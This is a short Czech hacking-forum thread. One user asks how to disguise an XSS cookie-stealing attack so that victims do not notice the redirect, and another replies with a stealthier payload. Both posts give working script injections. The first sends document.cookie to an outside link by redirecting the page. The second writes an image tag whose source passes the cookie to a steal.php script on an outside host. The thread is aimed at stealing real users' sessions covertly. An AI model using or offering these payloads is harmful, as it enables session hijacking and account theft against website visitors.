"Maskování" XSS cookie stealu

HackForum

"Maskování" XSS cookie stealu#
Čaute, nenapada zde nekoho nejaky zpusob jak zamaskovat ukradeni cookie ? Pro upresneni, kdyz pouziju <script>location.href = '[link]'+document.cookie;</script>, tak to uzivatele presmeruje a tem zkusenejsem asi dojde, ze neco neni vporadku. Takze ma otazka by se dala lepe formulovat, jak uzivatele co nejrychleji presmerovat zpet na predchozi stranku, aniz by zmanipulovanou URL videl (po delsi dobu) ? s encodovanim skriptu pomoci HEX a zkracenim URL samozrejme pocitam
(odpovědět)
xoxo | 94.113.173.*7.5.2014 13:41
re: "Maskování" XSS cookie stealu#
A proč to řešit hned přesměrováním? Do stránky stačí vložit například toto:

<script>document.write('<img src="http:\\www.mujweb.com/steal.php?cookie
='+document.cookie+'");</script>

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP7.5.2014 15:26

Zpět
 
 
 

 
BBCode